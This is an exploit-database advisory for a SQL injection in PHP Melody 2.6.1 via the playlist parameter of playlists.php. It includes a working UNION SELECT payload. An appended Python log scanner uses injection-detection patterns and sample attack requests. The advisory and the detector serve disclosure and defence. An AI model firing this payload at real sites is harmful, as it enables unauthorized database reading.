PHP Melody 2.6.1 - SQL Injection

EDB-ID: 43062
Author: Venkat Rajgor
Published: 2017-10-28
CVE: CVE-2017-15081
Type: Webapps
Platform: PHP
Vulnerable App: N/A

[+] Author : Venkat Rajgor
[+] Vulnerability : SQL injection
###################################################
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),null,null,null,null,null,null,null,null,null-- -
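
Detection example (added here; not part of the original advisory or PHP Melody code): a scanner that reviews web access logs for requests to playlists.php whose playlist parameter carries UNION-style injection constructs like the payload above. The alphanumeric ID format, the marker list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption (not from the advisory): legitimate playlist IDs are alphanumeric.
SAFE_ID = re.compile(r"^[A-Za-z0-9]{1,64}$")
# Constructs seen in UNION-based injection, including those in the payload above.
SQLI_MARKERS = re.compile(
    r"'|union\s+(?:all\s+)?select|--|/\*|#|\b0x[0-9a-f]{4,}|concat\s*\(|version\s*\(",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return 'ok', 'suspicious' or 'sqli' for a playlists.php request, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/playlists.php"):
        return None
    verdict = "ok"
    for value in parse_qs(url.query, keep_blank_values=True).get("playlist", []):
        value = unquote(value)  # parse_qs decoded once; decode again for double encoding
        if SQLI_MARKERS.search(value):
            return "sqli"
        if not SAFE_ID.match(value):
            verdict = "suspicious"
    return verdict

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2017:10:00:01 +0000] "GET /playlists.php?playlist=a1b2c3 HTTP/1.1" 200 5123',
    '198.51.100.7 - - [28/Oct/2017:10:00:05 +0000] "GET /playlists.php?playlist=%27%20UNION%20SELECT%20null,version()--%20- HTTP/1.1" 200 4876',
    '198.51.100.7 - - [28/Oct/2017:10:00:09 +0000] "GET /playlists.php?playlist=%2527%2520union%2520select%25201 HTTP/1.1" 200 4876',
    '192.0.2.10 - - [28/Oct/2017:10:00:12 +0000] "GET /playlists.php?playlist=my%20list HTTP/1.1" 200 5123',
    '192.0.2.10 - - [28/Oct/2017:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 900',
]

def scan(lines):
    """Return (verdict, line) pairs for every flagged playlists.php request."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict in ("suspicious", "sqli"):
            hits.append((verdict, line))
    return hits

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(verdict.upper(), line)
```

A "sqli" verdict on a request that returned HTTP 200 is worth correlating with database error logs and response sizes for the same client.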
